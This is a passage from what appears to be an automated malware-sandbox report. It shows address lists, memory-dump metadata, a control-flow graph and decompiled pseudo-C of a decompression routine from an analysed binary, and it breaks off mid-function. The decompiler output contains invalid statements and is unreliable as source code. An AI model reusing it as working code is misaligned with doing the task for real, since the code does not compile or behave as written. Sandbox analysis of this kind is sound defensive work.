                      0x004072eb
                      0x004072eb
                      0x0040731a
                      0x00407321
                      0x004072ab
                      0x004072ab
                      0x004072ab
                      0x004072ab
                      0x00000000
                      0x00407323
                      0x00407323
                      0x00000000
                      0x00407323
                      0x00407321
                      0x00407234
                      0x00407234
                      0x00407237
                      0x00407239
                      0x0040723c
                      0x0040723f
                      0x00407242
                      0x00407244
                      0x00407247
                      0x0040724a
                      0x0040724a
                      0x0040724d
                      0x0040724d
                      0x00407250
                      0x00407257
                      0x0040722b
                      0x0040722b
                      0x0040722b
                      0x0040722b
                      0x00000000
                      0x00407259
                      0x00407259
                      0x00000000
                      0x00407259
                      0x00407257
                      0x004071dd
                      0x004071dd
                      0x004071e0
                      0x004071e2
                      0x004071e5
                      0x00000000
                      0x00000000
                      0x00406f44
                      0x00406f44
                      0x00406f48
                      0x0040758d
                      0x0040758d
                      0x00000000
                      0x0040758d
                      0x00406f4e
                      0x00406f4e
                      0x00406f51
                      0x00406f54
                      0x00406f57
                      0x00406f5a
                      0x00406f5d
                      0x00406f60
                      0x00406f62
                      0x00406f65
                      0x00406f68
                      0x00406f6b
                      0x00406f6d
                      0x00406f6d
                      0x00406f6d
                      0x00000000
                      0x00000000
                      0x004070cf
                      0x004070cf
                      0x004070d3
                      0x00407599
                      0x00407599
                      0x00000000
                      0x00407599
                      0x004070d9
                      0x004070d9
                      0x004070dc
                      0x004070df
                      0x004070e2
                      0x004070e4
                      0x004070e4
                      0x004070e4
                      0x004070e7
                      0x004070ea
                      0x004070ed
                      0x004070f0
                      0x004070f3
                      0x004070f6
                      0x004070f7
                      0x004070f9
                      0x004070f9
                      0x004070f9
                      0x004070fc
                      0x004070ff
                      0x00407102
                      0x00407105
                      0x00407105
                      0x00407105
                      0x00407108
                      0x0040710a
                      0x0040710a
                      0x00000000
                      0x00000000
                      0x0040734c
                      0x0040734c
                      0x0040734c
                      0x00407350
                      0x00000000
                      0x00000000
                      0x00407356
                      0x00407356
                      0x00407359
                      0x0040735c
                      0x0040735f
                      0x00407361
                      0x00407361
                      0x00407361
                      0x00407364
                      0x00407367
                      0x0040736a
                      0x0040736d
                      0x00407370
                      0x00407373
                      0x00407374
                      0x00407376
                      0x00407376
                      0x00407376
                      0x00407379
                      0x0040737c
                      0x0040737f
                      0x00407382
                      0x00407385
                      0x00407389
                      0x0040738b
                      0x0040738e
                      0x00000000
                      0x00407390
                      0x00407390
                      0x0040710d
                      0x0040710d
                      0x00000000
                      0x0040710d
                      0x0040738e
                      0x004075c3
                      0x004075c3
                      0x00000000
                      0x00000000
                      0x00406bf2
                      0x004075fa
                      0x004075fa
                      0x00000000
                      0x004075fa
                      0x00407447
                      0x004074c7
                      0x00407490

                      Memory Dump Source
                      • Source File: 00000000.00000002.253377158.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000000.00000002.253370521.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.253387347.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.253394584.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.253394584.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.253394584.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.253394584.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.253394584.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.253445143.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_fyTwP4SHWF.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 9f3cc98df1e3ecd253cf91825a4064c55af45d063240f038e3dc270cc3f81a7c
                      • Instruction ID: 10cc2cc0f2c892254e5285b7a8bac4c216a70fda8fb68dfa7c3680dd08f727d3
                      • Opcode Fuzzy Hash: 9f3cc98df1e3ecd253cf91825a4064c55af45d063240f038e3dc270cc3f81a7c
                      • Instruction Fuzzy Hash: 55A15571E04228DBDF28CFA8C8547ADBBB1FF44305F10842AD856BB281D778A986DF45
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Control-flow Graph

                      • Executed
                      • Not Executed
                      control_flow_graph 749 407395-407399 750 4073bb-4073c8 749->750 751 40739b-40749d 749->751 753 4073cb-4073e0 750->753 761 4074c7-4074cb 751->761 754 4073e2-4073f8 753->754 755 4073fa-407410 753->755 757 407413-40741a 754->757 755->757 759 407441 757->759 760 40741c-407420 757->760 766 407447-40744d 759->766 764 407426-40743e 760->764 765 4075cf-4075d9 760->765 762 40752b-40753e 761->762 763 4074cd-4074ee 761->763 762->766 768 4074f0-407505 763->768 769 407507-40751a 763->769 764->759 767 4075e5-4075f8 765->767 771 406bf2 766->771 772 4075fa 766->772 774 4075fd-407601 767->774 773 40751d-407524 768->773 769->773 775 406bf9-406bfd 771->775 776 406d39-406d5a 771->776 777 406c9e-406ca2 771->777 778 406d0e-406d12 771->778 772->774 779 4074c4 773->779 780 407526 773->780 775->767 781 406c03-406c10 775->781 776->753 785 406ca8-406cc1 777->785 786 40754e-407558 777->786 782 406d18-406d2c 778->782 783 40755d-407567 778->783 779->761 787 4074a9-4074c1 780->787 788 4075db 780->788 781->772 789 406c16-406c5c 781->789 790 406d2f-406d37 782->790 783->767 791 406cc4-406cc8 785->791 786->767 787->779 788->767 792 406c84-406c86 789->792 793 406c5e-406c62 789->793 790->776 790->778 791->777 794 406cca-406cd0 791->794 799 406c94-406c9c 792->799 800 406c88-406c92 792->800 797 406c64-406c67 GlobalFree 793->797 798 406c6d-406c7b GlobalAlloc 793->798 795 406cd2-406cd9 794->795 796 406cfa-406d0c 794->796 801 406ce4-406cf4 GlobalAlloc 795->801 802 406cdb-406cde GlobalFree 795->802 796->790 797->798 798->772 803 406c81 798->803 799->791 800->799 800->800 801->772 801->796 802->801 803->792
                      C-Code - Quality: 98%
                      			E00407395() {
                      				void _t533;
                      				signed int _t534;
                      				signed int _t535;
                      				signed int* _t605;
                      				void* _t612;
                      
                      				L0:
                      				while(1) {
                      					L0:
                      					if( *(_t612 - 0x40) != 0) {
                      						 *(_t612 - 0x84) = 0x13;
                      						_t605 =  *((intOrPtr*)(_t612 - 0x58)) + 2;
                      						goto L132;
                      					} else {
                      						__eax =  *(__ebp - 0x4c);
                      						 *(__ebp - 0x30) =  *(__ebp - 0x30) & 0x00000000;
                      						__ecx =  *(__ebp - 0x58);
                      						__eax =  *(__ebp - 0x4c) << 4;
                      						__eax =  *(__ebp - 0x58) + __eax + 4;
                      						L130:
                      						 *(__ebp - 0x58) = __eax;
                      						 *(__ebp - 0x40) = 3;
                      						L144:
                      						 *(__ebp - 0x7c) = 0x14;
                      						L145:
                      						__eax =  *(__ebp - 0x40);
                      						 *(__ebp - 0x50) = 1;
                      						 *(__ebp - 0x48) =  *(__ebp - 0x40);
                      						L149:
                      						if( *(__ebp - 0x48) <= 0) {
                      							__ecx =  *(__ebp - 0x40);
                      							__ebx =  *(__ebp - 0x50);
                      							0 = 1;
                      							__eax = 1 << __cl;
                      							__ebx =  *(__ebp - 0x50) - (1 << __cl);
                      							__eax =  *(__ebp - 0x7c);
                      							 *(__ebp - 0x44) = __ebx;
                      							while(1) {
                      								L140:
                      								 *(_t612 - 0x88) = _t533;
                      								while(1) {
                      									L1:
                      									_t534 =  *(_t612 - 0x88);
                      									if(_t534 > 0x1c) {
                      										break;
                      									}
                      									switch( *((intOrPtr*)(_t534 * 4 +  &M00407602))) {
                      										case 0:
                      											if( *(_t612 - 0x6c) == 0) {
                      												goto L170;
                      											}
                      											 *(_t612 - 0x6c) =  *(_t612 - 0x6c) - 1;
                      											 *(_t612 - 0x70) =  &(( *(_t612 - 0x70))[1]);
                      											_t534 =  *( *(_t612 - 0x70));
                      											if(_t534 > 0xe1) {
                      												goto L171;
                      											}
                      											_t538 = _t534 & 0x000000ff;
                      											_push(0x2d);
                      											asm("cdq");
                      											_pop(_t569);
                      											_push(9);
                      											_pop(_t570);
                      											_t608 = _t538 / _t569;
                      											_t540 = _t538 % _t569 & 0x000000ff;
                      											asm("cdq");
                      											_t603 = _t540 % _t570 & 0x000000ff;
                      											 *(_t612 - 0x3c) = _t603;
                      											 *(_t612 - 0x1c) = (1 << _t608) - 1;
                      											 *((intOrPtr*)(_t612 - 0x18)) = (1 << _t540 / _t570) - 1;
                      											_t611 = (0x300 << _t603 + _t608) + 0x736;
                      											if(0x600 ==  *((intOrPtr*)(_t612 - 0x78))) {
                      												L10:
                      												if(_t611 == 0) {
                      													L12:
                      													 *(_t612 - 0x48) =  *(_t612 - 0x48) & 0x00000000;
                      													 *(_t612 - 0x40) =  *(_t612 - 0x40) & 0x00000000;
                      													goto L15;
                      												} else {
                      													goto L11;
                      												}
                      												do {
                      													L11:
                      													_t611 = _t611 - 1;
                      													 *((short*)( *(_t612 - 4) + _t611 * 2)) = 0x400;
                      												} while (_t611 != 0);
                      												goto L12;
                      											}
                      											if( *(_t612 - 4) != 0) {
                      												GlobalFree( *(_t612 - 4));
                      											}
                      											_t534 = GlobalAlloc(0x40, 0x600); // executed
                      											 *(_t612 - 4) = _t534;
                      											if(_t534 == 0) {
                      												goto L171;
                      											} else {
                      												 *((intOrPtr*)(_t612 - 0x78)) = 0x600;
                      												goto L10;
                      											}
                      										case 1:
                      											L13:
                      											__eflags =  *(_t612 - 0x6c);
                      											if( *(_t612 - 0x6c) == 0) {
                      												 *(_t612 - 0x88) = 1;
                      												goto L170;
                      											}
                      											 *(_t612 - 0x6c) =  *(_t612 - 0x6c) - 1;
                      											 *(_t612 - 0x40) =  *(_t612 - 0x40) | ( *( *(_t612 - 0x70)) & 0x000000ff) <<  *(_t612 - 0x48) << 0x00000003;
                      											 *(_t612 - 0x70) =  &(( *(_t612 - 0x70))[1]);
                      											_t45 = _t612 - 0x48;
                      											 *_t45 =  *(_t612 - 0x48) + 1;
                      											__eflags =  *_t45;
                      											L15:
                      											if( *(_t612 - 0x48) < 4) {
                      												goto L13;
                      											}
                      											_t546 =  *(_t612 - 0x40);
                      											if(_t546 ==  *(_t612 - 0x74)) {
                      												L20:
                      												 *(_t612 - 0x48) = 5;
                      												 *( *(_t612 - 8) +  *(_t612 - 0x74) - 1) =  *( *(_t612 - 8) +  *(_t612 - 0x74) - 1) & 0x00000000;
                      												goto L23;
                      											}
                      											 *(_t612 - 0x74) = _t546;
                      											if( *(_t612 - 8) != 0) {
                      												GlobalFree( *(_t612 - 8));
                      											}
                      											_t534 = GlobalAlloc(0x40,  *(_t612 - 0x40)); // executed
                      											 *(_t612 - 8) = _t534;
                      											if(_t534 == 0) {
                      												goto L171;
                      											} else {
                      												goto L20;
                      											}
                      										case 2:
                      											L24:
                      											_t553 =  *(_t612 - 0x60) &  *(_t612 - 0x1c);
                      											 *(_t612 - 0x84) = 6;
                      											 *(_t612 - 0x4c) = _t553;
                      											_t605 =  *(_t612 - 4) + (( *(_t612 - 0x38) << 4) + _t553) * 2;
                      											goto L132;
                      										case 3:
                      											L21:
                      											__eflags =  *(_t612 - 0x6c);
                      											if( *(_t612 - 0x6c) == 0) {
                      												 *(_t612 - 0x88) = 3;
                      												goto L170;
                      											}
                      											 *(_t612 - 0x6c) =  *(_t612 - 0x6c) - 1;
                      											_t67 = _t612 - 0x70;
                      											 *_t67 =  &(( *(_t612 - 0x70))[1]);
                      											__eflags =  *_t67;
                      											 *(_t612 - 0xc) =  *(_t612 - 0xc) << 0x00000008 |  *( *(_t612 - 0x70)) & 0x000000ff;
                      											L23:
                      											 *(_t612 - 0x48) =  *(_t612 - 0x48) - 1;
                      											if( *(_t612 - 0x48) != 0) {
                      												goto L21;
                      											}
                      											goto L24;
                      										case 4:
                      											L133:
                      											_t531 =  *_t605;
                      											_t588 = _t531 & 0x0000ffff;
                      											_t564 = ( *(_t612 - 0x10) >> 0xb) * _t588;
                      											if( *(_t612 - 0xc) >= _t564) {
                      												 *(_t612 - 0x10) =  *(_t612 - 0x10) - _t564;
                      												 *(_t612 - 0xc) =  *(_t612 - 0xc) - _t564;
                      												 *(_t612 - 0x40) = 1;
                      												_t532 = _t531 - (_t531 >> 5);
                      												__eflags = _t532;
                      												 *_t605 = _t532;
                      											} else {
                      												 *(_t612 - 0x10) = _t564;
                      												 *(_t612 - 0x40) =  *(_t612 - 0x40) & 0x00000000;
                      												 *_t605 = (0x800 - _t588 >> 5) + _t531;
                      											}
                      											if( *(_t612 - 0x10) >= 0x1000000) {
                      												goto L139;
                      											} else {
                      												goto L137;
                      											}
                      										case 5:
                      											L137:
                      											if( *(_t612 - 0x6c) == 0) {
                      												 *(_t612 - 0x88) = 5;
                      												goto L170;
                      											}
                      											 *(_t612 - 0x10) =  *(_t612 - 0x10) << 8;
                      											 *(_t612 - 0x6c) =  *(_t612 - 0x6c) - 1;
                      											 *(_t612 - 0x70) =  &(( *(_t612 - 0x70))[1]);
                      											 *(_t612 - 0xc) =  *(_t612 - 0xc) << 0x00000008 |  *( *(_t612 - 0x70)) & 0x000000ff;
                      											L139:
                      											_t533 =  *(_t612 - 0x84);
                      											goto L140;
                      										case 6:
                      											__edx = 0;
                      											__eflags =  *(__ebp - 0x40);
                      											if( *(__ebp - 0x40) != 0) {
                      												__eax =  *(__ebp - 4);
                      												__ecx =  *(__ebp - 0x38);
                      												 *(__ebp - 0x34) = 1;
                      												 *(__ebp - 0x84) = 7;
                      												__esi =  *(__ebp - 4) + 0x180 +  *(__ebp - 0x38) * 2;
                      												goto L132;
                      											}
                      											__eax =  *(__ebp - 0x5c) & 0x000000ff;
                      											__esi =  *(__ebp - 0x60);
                      											__cl = 8;
                      											__cl = 8 -  *(__ebp - 0x3c);
                      											__esi =  *(__ebp - 0x60) &  *(__ebp - 0x18);
                      											__eax = ( *(__ebp - 0x5c) & 0x000000ff) >> 8;
                      											__ecx =  *(__ebp - 0x3c);
                      											__esi = ( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8;
                      											__ecx =  *(__ebp - 4);
                      											(( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2;
                      											__eax = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9;
                      											__eflags =  *(__ebp - 0x38) - 4;
                      											__eax = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
                      											 *(__ebp - 0x58) = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
                      											if( *(__ebp - 0x38) >= 4) {
                      												__eflags =  *(__ebp - 0x38) - 0xa;
                      												if( *(__ebp - 0x38) >= 0xa) {
                      													_t98 = __ebp - 0x38;
                      													 *_t98 =  *(__ebp - 0x38) - 6;
                      													__eflags =  *_t98;
                      												} else {
                      													 *(__ebp - 0x38) =  *(__ebp - 0x38) - 3;
                      												}
                      											} else {
                      												 *(__ebp - 0x38) = 0;
                      											}
                      											__eflags =  *(__ebp - 0x34) - __edx;
                      											if( *(__ebp - 0x34) == __edx) {
                      												__ebx = 0;
                      												__ebx = 1;
                      												goto L61;
                      											} else {
                      												__eax =  *(__ebp - 0x14);
                      												__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
                      												__eflags = __eax -  *(__ebp - 0x74);
                      												if(__eax >=  *(__ebp - 0x74)) {
                      													__eax = __eax +  *(__ebp - 0x74);
                      													__eflags = __eax;
                      												}
                      												__ecx =  *(__ebp - 8);
                      												__ebx = 0;
                      												__ebx = 1;
                      												__al =  *((intOrPtr*)(__eax + __ecx));
                      												 *(__ebp - 0x5b) =  *((intOrPtr*)(__eax + __ecx));
                      												goto L41;
                      											}
                      										case 7:
                      											__eflags =  *(__ebp - 0x40) - 1;
                      											if( *(__ebp - 0x40) != 1) {
                      												__eax =  *(__ebp - 0x24);
                      												 *(__ebp - 0x80) = 0x16;
                      												 *(__ebp - 0x20) =  *(__ebp - 0x24);
                      												__eax =  *(__ebp - 0x28);
                      												 *(__ebp - 0x24) =  *(__ebp - 0x28);
                      												__eax =  *(__ebp - 0x2c);
                      												 *(__ebp - 0x28) =  *(__ebp - 0x2c);
                      												__eax = 0;
                      												__eflags =  *(__ebp - 0x38) - 7;
                      												0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
                      												__al = __al & 0x000000fd;
                      												__eax = (__eflags >= 0) - 1 + 0xa;
                      												 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xa;
                      												__eax =  *(__ebp - 4);
                      												__eax =  *(__ebp - 4) + 0x664;
                      												__eflags = __eax;
                      												 *(__ebp - 0x58) = __eax;
                      												goto L69;
                      											}
                      											__eax =  *(__ebp - 4);
                      											__ecx =  *(__ebp - 0x38);
                      											 *(__ebp - 0x84) = 8;
                      											__esi =  *(__ebp - 4) + 0x198 +  *(__ebp - 0x38) * 2;
                      											goto L132;
                      										case 8:
                      											__eflags =  *(__ebp - 0x40);
                      											if( *(__ebp - 0x40) != 0) {
                      												__eax =  *(__ebp - 4);
                      												__ecx =  *(__ebp - 0x38);
                      												 *(__ebp - 0x84) = 0xa;
                      												__esi =  *(__ebp - 4) + 0x1b0 +  *(__ebp - 0x38) * 2;
                      											} else {
                      												__eax =  *(__ebp - 0x38);
                      												__ecx =  *(__ebp - 4);
                      												__eax =  *(__ebp - 0x38) + 0xf;
                      												 *(__ebp - 0x84) = 9;
                      												 *(__ebp - 0x38) + 0xf << 4 = ( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c);
                      												__esi =  *(__ebp - 4) + (( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c)) * 2;
                      											}
                      											goto L132;
                      										case 9:
                      											__eflags =  *(__ebp - 0x40);
                      											if( *(__ebp - 0x40) != 0) {
                      												goto L90;
                      											}
                      											__eflags =  *(__ebp - 0x60);
                      											if( *(__ebp - 0x60) == 0) {
                      												goto L171;
                      											}
                      											__eax = 0;
                      											__eflags =  *(__ebp - 0x38) - 7;
                      											_t259 =  *(__ebp - 0x38) - 7 >= 0;
                      											__eflags = _t259;
                      											0 | _t259 = _t259 + _t259 + 9;
                      											 *(__ebp - 0x38) = _t259 + _t259 + 9;
                      											goto L76;
                      										case 0xa:
                      											__eflags =  *(__ebp - 0x40);
                      											if( *(__ebp - 0x40) != 0) {
                      												__eax =  *(__ebp - 4);
                      												__ecx =  *(__ebp - 0x38);
                      												 *(__ebp - 0x84) = 0xb;
                      												__esi =  *(__ebp - 4) + 0x1c8 +  *(__ebp - 0x38) * 2;
                      												goto L132;
                      											}
                      											__eax =  *(__ebp - 0x28);
                      											goto L89;
                      										case 0xb:
                      											__eflags =  *(__ebp - 0x40);
                      											if( *(__ebp - 0x40) != 0) {
                      												__ecx =  *(__ebp - 0x24);
                      												__eax =  *(__ebp - 0x20);
                      												 *(__ebp - 0x20) =  *(__ebp - 0x24);
                      											} else {
                      												__eax =  *(__ebp - 0x24);
                      											}
                      											__ecx =  *(__ebp - 0x28);
                      											 *(__ebp - 0x24) =  *(__ebp - 0x28);
                      											L89:
                      											__ecx =  *(__ebp - 0x2c);
                      											 *(__ebp - 0x2c) = __eax;
                      											 *(__ebp - 0x28) =  *(__ebp - 0x2c);
                      											L90:
                      											__eax =  *(__ebp - 4);
                      											 *(__ebp - 0x80) = 0x15;
                      											__eax =  *(__ebp - 4) + 0xa68;
                      											 *(__ebp - 0x58) =  *(__ebp - 4) + 0xa68;
                      											goto L69;
                      										case 0xc:
                      											L100:
                      											__eflags =  *(__ebp - 0x6c);
                      											if( *(__ebp - 0x6c) == 0) {
                      												 *(__ebp - 0x88) = 0xc;
                      												goto L170;
                      											}
                      											__ecx =  *(__ebp - 0x70);
                      											__eax =  *(__ebp - 0xc);
                      											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                      											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                      											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                      											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                      											_t335 = __ebp - 0x70;
                      											 *_t335 =  *(__ebp - 0x70) + 1;
                      											__eflags =  *_t335;
                      											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                      											__eax =  *(__ebp - 0x2c);
                      											goto L102;
                      										case 0xd:
                      											L37:
                      											__eflags =  *(__ebp - 0x6c);
                      											if( *(__ebp - 0x6c) == 0) {
                      												 *(__ebp - 0x88) = 0xd;
                      												goto L170;
                      											}
                      											__ecx =  *(__ebp - 0x70);
                      											__eax =  *(__ebp - 0xc);
                      											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                      											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                      											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                      											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                      											_t122 = __ebp - 0x70;
                      											 *_t122 =  *(__ebp - 0x70) + 1;
                      											__eflags =  *_t122;
                      											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                      											L39:
                      											__eax =  *(__ebp - 0x40);
                      											__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
                      											if( *(__ebp - 0x48) !=  *(__ebp - 0x40)) {
                      												goto L48;
                      											}
                      											__eflags = __ebx - 0x100;
                      											if(__ebx >= 0x100) {
                      												goto L54;
                      											}
                      											L41:
                      											__eax =  *(__ebp - 0x5b) & 0x000000ff;
                      											 *(__ebp - 0x5b) =  *(__ebp - 0x5b) << 1;
                      											__ecx =  *(__ebp - 0x58);
                      											__eax = ( *(__ebp - 0x5b) & 0x000000ff) >> 7;
                      											 *(__ebp - 0x48) = __eax;
                      											__eax = __eax + 1;
                      											__eax = __eax << 8;
                      											__eax = __eax + __ebx;
                      											__esi =  *(__ebp - 0x58) + __eax * 2;
                      											 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
                      											__ax =  *__esi;
                      											 *(__ebp - 0x54) = __esi;
                      											__edx = __ax & 0x0000ffff;
                      											__ecx = ( *(__ebp - 0x10) >> 0xb) * __edx;
                      											__eflags =  *(__ebp - 0xc) - __ecx;
                      											if( *(__ebp - 0xc) >= __ecx) {
                      												 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
                      												 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
                      												__cx = __ax;
                      												 *(__ebp - 0x40) = 1;
                      												__cx = __ax >> 5;
                      												__eflags = __eax;
                      												__ebx = __ebx + __ebx + 1;
                      												 *__esi = __ax;
                      											} else {
                      												 *(__ebp - 0x40) =  *(__ebp - 0x40) & 0x00000000;
                      												 *(__ebp - 0x10) = __ecx;
                      												0x800 = 0x800 - __edx;
                      												0x800 - __edx >> 5 = (0x800 - __edx >> 5) + __eax;
                      												__ebx = __ebx + __ebx;
                      												 *__esi = __cx;
                      											}
                      											__eflags =  *(__ebp - 0x10) - 0x1000000;
                      											 *(__ebp - 0x44) = __ebx;
                      											if( *(__ebp - 0x10) >= 0x1000000) {
                      												goto L39;
                      											} else {
                      												goto L37;
                      											}
                      										case 0xe:
                      											L46:
                      											__eflags =  *(__ebp - 0x6c);
                      											if( *(__ebp - 0x6c) == 0) {
                      												 *(__ebp - 0x88) = 0xe;
                      												goto L170;
                      											}
                      											__ecx =  *(__ebp - 0x70);
                      											__eax =  *(__ebp - 0xc);
                      											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                      											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                      											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                      											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                      											_t156 = __ebp - 0x70;
                      											 *_t156 =  *(__ebp - 0x70) + 1;
                      											__eflags =  *_t156;
                      											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                      											while(1) {
                      												L48:
                      												__eflags = __ebx - 0x100;
                      												if(__ebx >= 0x100) {
                      													break;
                      												}
                      												__eax =  *(__ebp - 0x58);
                      												__edx = __ebx + __ebx;
                      												__ecx =  *(__ebp - 0x10);
                      												__esi = __edx + __eax;
                      												__ecx =  *(__ebp - 0x10) >> 0xb;
                      												__ax =  *__esi;
                      												 *(__ebp - 0x54) = __esi;
                      												__edi = __ax & 0x0000ffff;
                      												__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
                      												__eflags =  *(__ebp - 0xc) - __ecx;
                      												if( *(__ebp - 0xc) >= __ecx) {
                      													 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
                      													 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
                      													__cx = __ax;
                      													_t170 = __edx + 1; // 0x1
                      													__ebx = _t170;
                      													__cx = __ax >> 5;
                      													__eflags = __eax;
                      													 *__esi = __ax;
                      												} else {
                      													 *(__ebp - 0x10) = __ecx;
                      													0x800 = 0x800 - __edi;
                      													0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
                      													__ebx = __ebx + __ebx;
                      													 *__esi = __cx;
                      												}
                      												__eflags =  *(__ebp - 0x10) - 0x1000000;
                      												 *(__ebp - 0x44) = __ebx;
                      												if( *(__ebp - 0x10) >= 0x1000000) {
                      													continue;
                      												} else {
                      													goto L46;
                      												}
                      											}
                      											L54:
                      											_t173 = __ebp - 0x34;
                      											 *_t173 =  *(__ebp - 0x34) & 0x00000000;
                      											__eflags =  *_t173;
                      											goto L55;
                      										case 0xf:
                      											L58:
                      											__eflags =  *(__ebp - 0x6c);
                      											if( *(__ebp - 0x6c) == 0) {
                      												 *(__ebp - 0x88) = 0xf;
                      												goto L170;
                      											}
                      											__ecx =  *(__ebp - 0x70);
                      											__eax =  *(__ebp - 0xc);
                      											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                      											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                      											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                      											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                      											_t203 = __ebp - 0x70;
                      											 *_t203 =  *(__ebp - 0x70) + 1;
                      											__eflags =  *_t203;
                      											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                      											L60:
                      											__eflags = __ebx - 0x100;
                      											if(__ebx >= 0x100) {
                      												L55:
                      												__al =  *(__ebp - 0x44);
                      												 *(__ebp - 0x5c) =  *(__ebp - 0x44);
                      												goto L56;
                      											}
                      											L61:
                      											__eax =  *(__ebp - 0x58);
                      											__edx = __ebx + __ebx;
                      											__ecx =  *(__ebp - 0x10);
                      											__esi = __edx + __eax;
                      											__ecx =  *(__ebp - 0x10) >> 0xb;
                      											__ax =  *__esi;
                      											 *(__ebp - 0x54) = __esi;
                      											__edi = __ax & 0x0000ffff;
                      											__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
                      											__eflags =  *(__ebp - 0xc) - __ecx;
                      											if( *(__ebp - 0xc) >= __ecx) {
                      												 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
                      												 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
                      												__cx = __ax;
                      												_t217 = __edx + 1; // 0x1
                      												__ebx = _t217;
                      												__cx = __ax >> 5;
                      												__eflags = __eax;
                      												 *__esi = __ax;
                      											} else {
                      												 *(__ebp - 0x10) = __ecx;
                      												0x800 = 0x800 - __edi;
                      												0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
                      												__ebx = __ebx + __ebx;
                      												 *__esi = __cx;
                      											}
                      											__eflags =  *(__ebp - 0x10) - 0x1000000;
                      											 *(__ebp - 0x44) = __ebx;
                      											if( *(__ebp - 0x10) >= 0x1000000) {
                      												goto L60;
                      											} else {
                      												goto L58;
                      											}
                      										case 0x10:
                      											L110:
                      											__eflags =  *(__ebp - 0x6c);
                      											if( *(__ebp - 0x6c) == 0) {
                      												 *(__ebp - 0x88) = 0x10;
                      												goto L170;
                      											}
                      											__ecx =  *(__ebp - 0x70);
                      											__eax =  *(__ebp - 0xc);
                      											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                      											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
